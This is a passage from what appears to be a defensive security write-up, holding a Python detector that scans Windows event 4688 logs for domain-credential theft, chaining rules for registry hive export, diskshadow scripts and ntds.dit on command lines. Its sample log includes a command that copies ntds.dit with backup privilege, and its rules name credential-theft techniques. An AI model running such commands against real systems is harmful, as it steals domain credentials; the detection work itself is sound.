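EventID=4688 SubjectUserName=svc_backup NewProcessName=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe CommandLine="powershell Copy-FileSeBackupPrivilege T:\windows\ntds\ntds.dit C:\Windows\system32\spool\drivers\color\ntds.dit -Overwrite"
EventID=4688 SubjectUserName=jdoe NewProcessName=C:\Windows\System32\reg.exe CommandLine="reg.exe query hklm\software\Microsoft"
EventID=4688 SubjectUserName=SYSTEM NewProcessName=C:\Windows\System32\diskshadow.exe CommandLine="diskshadow"
"""

# Each rule is one link of the chain; a single hit is worth a look, two or
# more distinct rules for the same account is the whole chain.
RULES = [
    ("hive export", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I)),
    ("diskshadow script", re.compile(r"\bdiskshadow(\.exe)?\b.*\s[/-]s\s+\S+", re.I)),
    ("ntds.dit on cmdline", re.compile(r"ntds\.dit", re.I)),
]

# key=value pairs; a quoted value (the command line) may contain spaces.
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_4688(text):
    """Parse the key=value lines into dicts, keeping only event 4688."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = {k: v.strip('"') for k, v in FIELD.findall(line)}
        if fields.get("EventID") == "4688":
            events.append(fields)
    return events

def scan_4688(events):
    """Return (account, rule name) for every command line a rule matches."""
    hits = []
    for e in events:
        for name, rx in RULES:
            if rx.search(e.get("CommandLine", "")):
                hits.append((e["SubjectUserName"], name))
    return hits

def chained_accounts(hits, min_rules=2):
    """Accounts that triggered at least min_rules distinct rules."""
    seen = defaultdict(set)
    for account, name in hits:
        seen[account].add(name)
    return sorted(a for a, names in seen.items() if len(names) >= min_rules)

if __name__ == "__main__":
    found = scan_4688(parse_4688(SAMPLE_4688))
    for account, name in found:
        print(f"{account}: {name}")
    print("chain:", chained_accounts(found))
```

Membership of BUILTIN\Backup Operators (S-1-5-32-551, visible in the whoami output above) is the precondition for the whole chain, so alerting on additions to that group is the cheaper control.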
